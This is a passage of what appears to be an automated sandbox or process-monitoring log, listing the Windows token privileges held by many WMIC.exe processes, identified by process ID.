WMIC.exe Token: 35 1480 WMIC.exe Token: SeIncreaseQuotaPrivilege 1480 WMIC.exe Token: SeSecurityPrivilege 1480 WMIC.exe Token: SeTakeOwnershipPrivilege 1480 WMIC.exe Token: SeLoadDriverPrivilege 1480 WMIC.exe Token: SeSystemProfilePrivilege 1480 WMIC.exe Token: SeSystemtimePrivilege 1480 WMIC.exe Token: SeProfSingleProcessPrivilege 1480 WMIC.exe Token: SeIncBasePriorityPrivilege 1480 WMIC.exe Token: SeCreatePagefilePrivilege 1480 WMIC.exe Token: SeBackupPrivilege 1480 WMIC.exe Token: SeRestorePrivilege 1480 WMIC.exe Token: SeShutdownPrivilege 1480 WMIC.exe Token: SeDebugPrivilege 1480 WMIC.exe Token: SeSystemEnvironmentPrivilege 1480 WMIC.exe Token: SeRemoteShutdownPrivilege 1480 WMIC.exe Token: SeUndockPrivilege 1480 WMIC.exe Token: SeManageVolumePrivilege 1480 WMIC.exe Token: 33 1480 WMIC.exe Token: 34 1480 WMIC.exe Token: 35 1480 WMIC.exe Token: SeIncreaseQuotaPrivilege 1308 WMIC.exe Token: SeSecurityPrivilege 1308 WMIC.exe Token: SeTakeOwnershipPrivilege 1308 WMIC.exe Token: SeLoadDriverPrivilege 1308 WMIC.exe Token: SeSystemProfilePrivilege 1308 WMIC.exe Token: SeSystemtimePrivilege 1308 WMIC.exe Token: SeProfSingleProcessPrivilege 1308 WMIC.exe Token: SeIncBasePriorityPrivilege 1308 WMIC.exe Token: SeCreatePagefilePrivilege 1308 WMIC.exe Token: SeBackupPrivilege 1308 WMIC.exe Token: SeRestorePrivilege 1308 WMIC.exe Token: SeShutdownPrivilege 1308 WMIC.exe Token: SeDebugPrivilege 1308 WMIC.exe Token: SeSystemEnvironmentPrivilege 1308 WMIC.exe Token: SeRemoteShutdownPrivilege 1308 WMIC.exe Token: SeUndockPrivilege 1308 WMIC.exe Token: SeManageVolumePrivilege 1308 WMIC.exe Token: 33 1308 WMIC.exe Token: 34 1308 WMIC.exe Token: 35 1308 WMIC.exe Token: SeIncreaseQuotaPrivilege 1308 WMIC.exe Token: SeSecurityPrivilege 1308 WMIC.exe Token: SeTakeOwnershipPrivilege 1308 WMIC.exe Token: SeLoadDriverPrivilege 1308 WMIC.exe Token: SeSystemProfilePrivilege 1308 WMIC.exe Token: SeSystemtimePrivilege 1308 WMIC.exe Token: SeProfSingleProcessPrivilege 1308 WMIC.exe Token: SeIncBasePriorityPrivilege 1308 WMIC.exe Token: SeCreatePagefilePrivilege 1308 WMIC.exe Token: SeBackupPrivilege 1308 WMIC.exe Token: SeRestorePrivilege 1308 WMIC.exe Token: SeShutdownPrivilege 1308 WMIC.exe Token: SeDebugPrivilege 1308 WMIC.exe Token: SeSystemEnvironmentPrivilege 1308 WMIC.exe Token: SeRemoteShutdownPrivilege 1308 WMIC.exe Token: SeUndockPrivilege 1308 WMIC.exe Token: SeManageVolumePrivilege 1308 WMIC.exe Token: 33 1308 WMIC.exe Token: 34 1308 WMIC.exe Token: 35 1308 WMIC.exe Token: SeIncreaseQuotaPrivilege 276 WMIC.exe Token: SeSecurityPrivilege 276 WMIC.exe Token: SeTakeOwnershipPrivilege 276 WMIC.exe Token: SeLoadDriverPrivilege 276 WMIC.exe Token: SeSystemProfilePrivilege 276 WMIC.exe Token: SeSystemtimePrivilege 276 WMIC.exe Token: SeProfSingleProcessPrivilege 276 WMIC.exe Token: SeIncBasePriorityPrivilege 276 WMIC.exe Token: SeCreatePagefilePrivilege 276 WMIC.exe Token: SeBackupPrivilege 276 WMIC.exe Token: SeRestorePrivilege 276 WMIC.exe Token: SeShutdownPrivilege 276 WMIC.exe Token: SeDebugPrivilege 276 WMIC.exe Token: SeSystemEnvironmentPrivilege 276 WMIC.exe Token: SeRemoteShutdownPrivilege 276 WMIC.exe Token: SeUndockPrivilege 276 WMIC.exe Token: SeManageVolumePrivilege 276 WMIC.exe Token: 33 276 WMIC.exe Token: 34 276 WMIC.exe Token: 35 276 WMIC.exe Token: SeIncreaseQuotaPrivilege 276 WMIC.exe Token: SeSecurityPrivilege 276 WMIC.exe Token: SeTakeOwnershipPrivilege 276 WMIC.exe Token: SeLoadDriverPrivilege 276 WMIC.exe Token: SeSystemProfilePrivilege 276 WMIC.exe Token: SeSystemtimePrivilege 276 WMIC.exe Token: SeProfSingleProcessPrivilege 276 WMIC.exe Token: SeIncBasePriorityPrivilege 276 WMIC.exe Token: SeCreatePagefilePrivilege 276 WMIC.exe Token: SeBackupPrivilege 276 WMIC.exe Token: SeRestorePrivilege 276 WMIC.exe Token: SeShutdownPrivilege 276 WMIC.exe Token: SeDebugPrivilege 276 WMIC.exe Token: SeSystemEnvironmentPrivilege 276 WMIC.exe Token: SeRemoteShutdownPrivilege 276 WMIC.exe Token: SeUndockPrivilege 276 WMIC.exe Token: SeManageVolumePrivilege 276 WMIC.exe Token: 33 276 WMIC.exe Token: 34 276 WMIC.exe Token: 35 276 WMIC.exe Token: SeIncreaseQuotaPrivilege 432 WMIC.exe Token: SeSecurityPrivilege 432 WMIC.exe Token: SeTakeOwnershipPrivilege 432 WMIC.exe Token: SeLoadDriverPrivilege 432 WMIC.exe Token: SeSystemProfilePrivilege 432 WMIC.exe Token: SeSystemtimePrivilege 432 WMIC.exe Token: SeProfSingleProcessPrivilege 432 WMIC.exe Token: SeIncBasePriorityPrivilege 432 WMIC.exe Token: SeCreatePagefilePrivilege 432 WMIC.exe Token: SeBackupPrivilege 432 WMIC.exe Token: SeRestorePrivilege 432 WMIC.exe Token: SeShutdownPrivilege 432 WMIC.exe Token: SeDebugPrivilege 432 WMIC.exe Token: SeSystemEnvironmentPrivilege 432 WMIC.exe Token: SeRemoteShutdownPrivilege 432 WMIC.exe Token: SeUndockPrivilege 432 WMIC.exe Token: SeManageVolumePrivilege 432 WMIC.exe Token: 33 432 WMIC.exe Token: 34 432 WMIC.exe Token: 35 432 WMIC.exe Token: SeIncreaseQuotaPrivilege 432 WMIC.exe Token: SeSecurityPrivilege 432 WMIC.exe Token: SeTakeOwnershipPrivilege 432 WMIC.exe Token: SeLoadDriverPrivilege 432 WMIC.exe Token: SeSystemProfilePrivilege 432 WMIC.exe Token: SeSystemtimePrivilege 432 WMIC.exe Token: SeProfSingleProcessPrivilege 432 WMIC.exe Token: SeIncBasePriorityPrivilege 432 WMIC.exe Token: SeCreatePagefilePrivilege 432 WMIC.exe Token: SeBackupPrivilege 432 WMIC.exe Token: SeRestorePrivilege 432 WMIC.exe Token: SeShutdownPrivilege 432 WMIC.exe Token: SeDebugPrivilege 432 WMIC.exe Token: SeSystemEnvironmentPrivilege 432 WMIC.exe Token: SeRemoteShutdownPrivilege 432 WMIC.exe Token: SeUndockPrivilege 432 WMIC.exe Token: SeManageVolumePrivilege 432 WMIC.exe Token: 33 432 WMIC.exe Token: 34 432 WMIC.exe Token: 35 432 WMIC.exe Token: SeIncreaseQuotaPrivilege 216 WMIC.exe Token: SeSecurityPrivilege 216 WMIC.exe Token: SeTakeOwnershipPrivilege 216 WMIC.exe Token: SeLoadDriverPrivilege 216 WMIC.exe Token: SeSystemProfilePrivilege 216 WMIC.exe Token: SeSystemtimePrivilege 216 WMIC.exe Token: SeProfSingleProcessPrivilege 216 WMIC.exe Token: SeIncBasePriorityPrivilege 216 WMIC.exe Token: SeCreatePagefilePrivilege 216 WMIC.exe Token: SeBackupPrivilege 216 WMIC.exe Token: SeRestorePrivilege 216 WMIC.exe Token: SeShutdownPrivilege 216 WMIC.exe Token: SeDebugPrivilege 216 WMIC.exe Token: SeSystemEnvironmentPrivilege 216 WMIC.exe Token: SeRemoteShutdownPrivilege 216 WMIC.exe Token: SeUndockPrivilege 216 WMIC.exe Token: SeManageVolumePrivilege 216 WMIC.exe Token: 33 216 WMIC.exe Token: 34 216 WMIC.exe Token: 35 216 WMIC.exe Token: SeIncreaseQuotaPrivilege 216 WMIC.exe Token: SeSecurityPrivilege 216 WMIC.exe Token: SeTakeOwnershipPrivilege 216 WMIC.exe Token: SeLoadDriverPrivilege 216 WMIC.exe Token: SeSystemProfilePrivilege 216 WMIC.exe Token: SeSystemtimePrivilege 216 WMIC.exe Token: SeProfSingleProcessPrivilege 216 WMIC.exe Token: SeIncBasePriorityPrivilege 216 WMIC.exe Token: SeCreatePagefilePrivilege 216 WMIC.exe Token: SeBackupPrivilege 216 WMIC.exe Token: SeRestorePrivilege 216 WMIC.exe Token: SeShutdownPrivilege 216 WMIC.exe Token: SeDebugPrivilege 216 WMIC.exe Token: SeSystemEnvironmentPrivilege 216 WMIC.exe Token: SeRemoteShutdownPrivilege 216 WMIC.exe Token: SeUndockPrivilege 216 WMIC.exe Token: SeManageVolumePrivilege 216 WMIC.exe Token: 33 216 WMIC.exe Token: 34 216 WMIC.exe Token: 35 216 WMIC.exe Token: SeIncreaseQuotaPrivilege 1500 WMIC.exe Token: SeSecurityPrivilege 1500 WMIC.exe Token: SeTakeOwnershipPrivilege 1500 WMIC.exe Token: SeLoadDriverPrivilege 1500 WMIC.exe Token: SeSystemProfilePrivilege 1500 WMIC.exe Token: SeSystemtimePrivilege 1500 WMIC.exe Token: SeProfSingleProcessPrivilege 1500 WMIC.exe Token: SeIncBasePriorityPrivilege 1500 WMIC.exe Token: SeCreatePagefilePrivilege 1500 WMIC.exe Token: SeBackupPrivilege 1500 WMIC.exe Token: SeRestorePrivilege 1500 WMIC.exe Token: SeShutdownPrivilege 1500 WMIC.exe Token: SeDebugPrivilege 1500 WMIC.exe Token: SeSystemEnvironmentPrivilege 1500 WMIC.exe Token: SeRemoteShutdownPrivilege 1500 WMIC.exe Token: SeUndockPrivilege 1500 WMIC.exe Token: SeManageVolumePrivilege 1500 WMIC.exe Token: 33 1500 WMIC.exe Token: 34 1500 WMIC.exe Token: 35 1500 WMIC.exe Token: SeIncreaseQuotaPrivilege 1500 WMIC.exe Token: SeSecurityPrivilege 1500 WMIC.exe Token: SeTakeOwnershipPrivilege 1500 WMIC.exe Token: SeLoadDriverPrivilege 1500 WMIC.exe Token: SeSystemProfilePrivilege 1500 WMIC.exe Token: SeSystemtimePrivilege 1500 WMIC.exe Token: SeProfSingleProcessPrivilege 1500 WMIC.exe Token: SeIncBasePriorityPrivilege 1500 WMIC.exe Token: SeCreatePagefilePrivilege 1500 WMIC.exe Token: SeBackupPrivilege 1500 WMIC.exe Token: SeRestorePrivilege 1500 WMIC.exe Token: SeShutdownPrivilege 1500 WMIC.exe Token: SeDebugPrivilege 1500 WMIC.exe Token: SeSystemEnvironmentPrivilege 1500 WMIC.exe Token: SeRemoteShutdownPrivilege 1500 WMIC.exe Token: SeUndockPrivilege 1500 WMIC.exe Token: SeManageVolumePrivilege 1500 WMIC.exe Token: 33 1500 WMIC.exe Token: 34 1500 WMIC.exe Token: 35 1500 WMIC.exe Token: SeIncreaseQuotaPrivilege 1592 WMIC.exe Token: SeSecurityPrivilege 1592 WMIC.exe Token: SeTakeOwnershipPrivilege 1592 WMIC.exe Token: SeLoadDriverPrivilege 1592 WMIC.exe Token: SeSystemProfilePrivilege 1592 WMIC.exe Token: SeSystemtimePrivilege 1592 WMIC.exe Token: SeProfSingleProcessPrivilege 1592 WMIC.exe Token: SeIncBasePriorityPrivilege 1592 WMIC.exe Token: SeCreatePagefilePrivilege 1592 WMIC.exe Token: SeBackupPrivilege 1592 WMIC.exe Token: SeRestorePrivilege 1592 WMIC.exe Token: SeShutdownPrivilege 1592 WMIC.exe Token: SeDebugPrivilege 1592 WMIC.exe Token: SeSystemEnvironmentPrivilege 1592 WMIC.exe Token: SeRemoteShutdownPrivilege 1592 WMIC.exe Token: SeUndockPrivilege 1592 WMIC.exe Token: SeManageVolumePrivilege 1592 WMIC.exe Token: 33 1592 WMIC.exe Token: 34 1592 WMIC.exe Token: 35 1592 WMIC.exe Token: SeIncreaseQuotaPrivilege 1592 WMIC.exe Token: SeSecurityPrivilege 1592 WMIC.exe Token: SeTakeOwnershipPrivilege 1592 WMIC.exe Token: SeLoadDriverPrivilege 1592 WMIC.exe Token: SeSystemProfilePrivilege 1592 WMIC.exe Token: SeSystemtimePrivilege 1592 WMIC.exe Token: SeProfSingleProcessPrivilege 1592 WMIC.exe Token: SeIncBasePriorityPrivilege 1592 WMIC.exe Token: SeCreatePagefilePrivilege 1592 WMIC.exe Token: SeBackupPrivilege 1592 WMIC.exe Token: SeRestorePrivilege 1592 WMIC.exe Token: SeShutdownPrivilege 1592 WMIC.exe Token: SeDebugPrivilege 1592 WMIC.exe Token: SeSystemEnvironmentPrivilege 1592 WMIC.exe Token: SeRemoteShutdownPrivilege 1592 WMIC.exe Token: SeUndockPrivilege 1592 WMIC.exe Token: SeManageVolumePrivilege 1592 WMIC.exe Token: 33 1592 WMIC.exe Token: 34 1592 WMIC.exe Token: 35 1592 WMIC.exe Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeSecurityPrivilege 1192 WMIC.exe Token: SeTakeOwnershipPrivilege 1192 WMIC.exe Token: SeLoadDriverPrivilege 1192 WMIC.exe Token: SeSystemProfilePrivilege 1192 WMIC.exe Token: SeSystemtimePrivilege 1192 WMIC.exe Token: SeProfSingleProcessPrivilege 1192 WMIC.exe Token: SeIncBasePriorityPrivilege 1192 WMIC.exe Token: SeCreatePagefilePrivilege 1192 WMIC.exe Token: SeBackupPrivilege 1192 WMIC.exe Token: SeRestorePrivilege 1192 WMIC.exe Token: SeShutdownPrivilege 1192 WMIC.exe Token: SeDebugPrivilege 1192 WMIC.exe Token: SeSystemEnvironmentPrivilege 1192 WMIC.exe Token: SeRemoteShutdownPrivilege 1192 WMIC.exe Token: SeUndockPrivilege 1192 WMIC.exe Token: SeManageVolumePrivilege 1192 WMIC.exe Token: 33 1192 WMIC.exe Token: 34 1192 WMIC.exe Token: 35 1192 WMIC.exe Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeSecurityPrivilege 1192 WMIC.exe Token: SeTakeOwnershipPrivilege 1192 WMIC.exe Token: SeLoadDriverPrivilege 1192 WMIC.exe Token: SeSystemProfilePrivilege 1192 WMIC.exe Token: SeSystemtimePrivilege 1192 WMIC.exe Token: SeProfSingleProcessPrivilege 1192 WMIC.exe Token: SeIncBasePriorityPrivilege 1192 WMIC.exe Token: SeCreatePagefilePrivilege 1192 WMIC.exe Token: SeBackupPrivilege 1192 WMIC.exe Token: SeRestorePrivilege 1192 WMIC.exe Token: SeShutdownPrivilege 1192 WMIC.exe Token: SeDebugPrivilege 1192 WMIC.exe Token: SeSystemEnvironmentPrivilege 1192 WMIC.exe Token: SeRemoteShutdownPrivilege 1192 WMIC.exe Token: SeUndockPrivilege 1192 WMIC.exe Token: SeManageVolumePrivilege 1192 WMIC.exe Token: 33 1192 WMIC.exe Token: 34 1192 WMIC.exe Token: 35 1192 WMIC.exe Token: SeIncreaseQuotaPrivilege 1572 WMIC.exe Token: SeSecurityPrivilege 1572 WMIC.exe Token: SeTakeOwnershipPrivilege 1572 WMIC.exe Token: SeLoadDriverPrivilege 1572 WMIC.exe Token: SeSystemProfilePrivilege 1572 WMIC.exe Token: SeSystemtimePrivilege 1572 WMIC.exe Token: SeProfSingleProcessPrivilege 1572 WMIC.exe Token: SeIncBasePriorityPrivilege 1572 WMIC.exe Token: SeCreatePagefilePrivilege 1572 WMIC.exe Token: SeBackupPrivilege 1572 WMIC.exe Token: SeRestorePrivilege 1572 WMIC.exe Token: SeShutdownPrivilege 1572 WMIC.exe Token: SeDebugPrivilege 1572 WMIC.exe Token: SeSystemEnvironmentPrivilege 1572 WMIC.exe Token: SeRemoteShutdownPrivilege 1572 WMIC.exe Token: SeUndockPrivilege 1572 WMIC.exe Token: SeManageVolumePrivilege 1572 WMIC.exe Token: 33 1572 WMIC.exe Token: 34 1572 WMIC.exe Token: 35 1572 WMIC.exe Token: SeIncreaseQuotaPrivilege 1572 WMIC.exe Token: SeSecurityPrivilege 1572 WMIC.exe Token: SeTakeOwnershipPrivilege 1572 WMIC.exe Token: SeLoadDriverPrivilege 1572 WMIC.exe Token: SeSystemProfilePrivilege 1572 WMIC.exe Token: SeSystemtimePrivilege 1572 WMIC.exe Token: SeProfSingleProcessPrivilege 1572 WMIC.exe Token: SeIncBasePriorityPrivilege 1572 WMIC.exe Token: SeCreatePagefilePrivilege 1572 WMIC.exe Token: SeBackupPrivilege 1572 WMIC.exe Token: SeRestorePrivilege 1572 WMIC.exe Token: SeShutdownPrivilege 1572 WMIC.exe Token: SeDebugPrivilege 1572 WMIC.exe Token: SeSystemEnvironmentPrivilege 1572 WMIC.exe Token: SeRemoteShutdownPrivilege 1572 WMIC.exe Token: SeUndockPrivilege 1572 WMIC.exe Token: SeManageVolumePrivilege 1572 WMIC.exe Token: 33 1572 WMIC.exe Token: 34 1572 WMIC.exe Token: 35 1572 WMIC.exe Token: SeIncreaseQuotaPrivilege 1880 WMIC.exe Token: SeSecurityPrivilege 1880 WMIC.exe Token: SeTakeOwnershipPrivilege 1880 WMIC.exe Token: SeLoadDriverPrivilege 1880 WMIC.exe Token: SeSystemProfilePrivilege 1880 WMIC.exe Token: SeSystemtimePrivilege 1880 WMIC.exe Token: SeProfSingleProcessPrivilege 1880 WMIC.exe Token: SeIncBasePriorityPrivilege 1880 WMIC.exe Token: SeCreatePagefilePrivilege 1880 WMIC.exe Token: SeBackupPrivilege 1880 WMIC.exe Token: SeRestorePrivilege 1880 WMIC.exe Token: SeShutdownPrivilege 1880 WMIC.exe Token: SeDebugPrivilege 1880 WMIC.exe Token: SeSystemEnvironmentPrivilege 1880 WMIC.exe Token: SeRemoteShutdownPrivilege 1880 WMIC.exe Token: SeUndockPrivilege 1880 WMIC.exe Token: SeManageVolumePrivilege 1880 WMIC.exe Token: 33 1880 WMIC.exe Token: 34 1880 WMIC.exe Token: 35 1880 WMIC.exe Token: SeIncreaseQuotaPrivilege 1880 WMIC.exe Token: SeSecurityPrivilege 1880 WMIC.exe Token: SeTakeOwnershipPrivilege 1880 WMIC.exe Token: SeLoadDriverPrivilege 1880 WMIC.exe Token: SeSystemProfilePrivilege 1880 WMIC.exe Token: SeSystemtimePrivilege 1880 WMIC.exe Token: SeProfSingleProcessPrivilege 1880 WMIC.exe Token: SeIncBasePriorityPrivilege 1880 WMIC.exe Token: SeCreatePagefilePrivilege 1880 WMIC.exe Token: SeBackupPrivilege 1880 WMIC.exe Token: SeRestorePrivilege 1880 WMIC.exe Token: SeShutdownPrivilege 1880 WMIC.exe Token: SeDebugPrivilege 1880 WMIC.exe Token: SeSystemEnvironmentPrivilege 1880 WMIC.exe Token: SeRemoteShutdownPrivilege 1880 WMIC.exe Token: SeUndockPrivilege 1880 WMIC.exe Token: SeManageVolumePrivilege 1880 WMIC.exe Token: 33 1880 WMIC.exe Token: 34 1880 WMIC.exe Token: 35 1880 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemProfilePrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeProfSingleProcessPrivilege 1840 WMIC.exe Token: SeIncBasePriorityPrivilege 1840 WMIC.exe Token: SeCreatePagefilePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeRemoteShutdownPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: 33 1840 WMIC.exe Token: 34 1840 WMIC.exe Token: 35 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemProfilePrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeProfSingleProcessPrivilege 1840 WMIC.exe Token: SeIncBasePriorityPrivilege 1840 WMIC.exe Token: SeCreatePagefilePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeRemoteShutdownPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: 33 1840 WMIC.exe Token: 34 1840 WMIC.exe Token: 35 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1916 WMIC.exe Token: SeSecurityPrivilege 1916 WMIC.exe Token: SeTakeOwnershipPrivilege 1916 WMIC.exe Token: SeLoadDriverPrivilege 1916 WMIC.exe Token: SeSystemProfilePrivilege 1916 WMIC.exe Token: SeSystemtimePrivilege 1916 WMIC.exe Token: SeProfSingleProcessPrivilege 1916 WMIC.exe Token: SeIncBasePriorityPrivilege 1916 WMIC.exe Token: SeCreatePagefilePrivilege 1916 WMIC.exe Token: SeBackupPrivilege 1916 WMIC.exe Token: SeRestorePrivilege 1916 WMIC.exe Token: SeShutdownPrivilege 1916 WMIC.exe Token: SeDebugPrivilege 1916 WMIC.exe Token: SeSystemEnvironmentPrivilege 1916 WMIC.exe Token: SeRemoteShutdownPrivilege 1916 WMIC.exe Token: SeUndockPrivilege 1916 WMIC.exe Token: SeManageVolumePrivilege 1916 WMIC.exe Token: 33 1916 WMIC.exe Token: 34 1916 WMIC.exe Token: 35 1916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1916 WMIC.exe Token: SeSecurityPrivilege 1916 WMIC.exe Token: SeTakeOwnershipPrivilege 1916 WMIC.exe Token: SeLoadDriverPrivilege 1916 WMIC.exe Token: SeSystemProfilePrivilege 1916 WMIC.exe Token: SeSystemtimePrivilege 1916 WMIC.exe Token: SeProfSingleProcessPrivilege 1916 WMIC.exe Token: SeIncBasePriorityPrivilege 1916 WMIC.exe Token: SeCreatePagefilePrivilege 1916 WMIC.exe Token: SeBackupPrivilege 1916 WMIC.exe Token: SeRestorePrivilege 1916 WMIC.exe Token: SeShutdownPrivilege 1916 WMIC.exe Token: SeDebugPrivilege 1916 WMIC.exe Token: SeSystemEnvironmentPrivilege 1916 WMIC.exe Token: SeRemoteShutdownPrivilege 1916 WMIC.exe Token: SeUndockPrivilege 1916 WMIC.exe Token: SeManageVolumePrivilege 1916 WMIC.exe Token: 33 1916 WMIC.exe Token: 34 1916 WMIC.exe Token: 35 1916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 WMIC.exe Token: 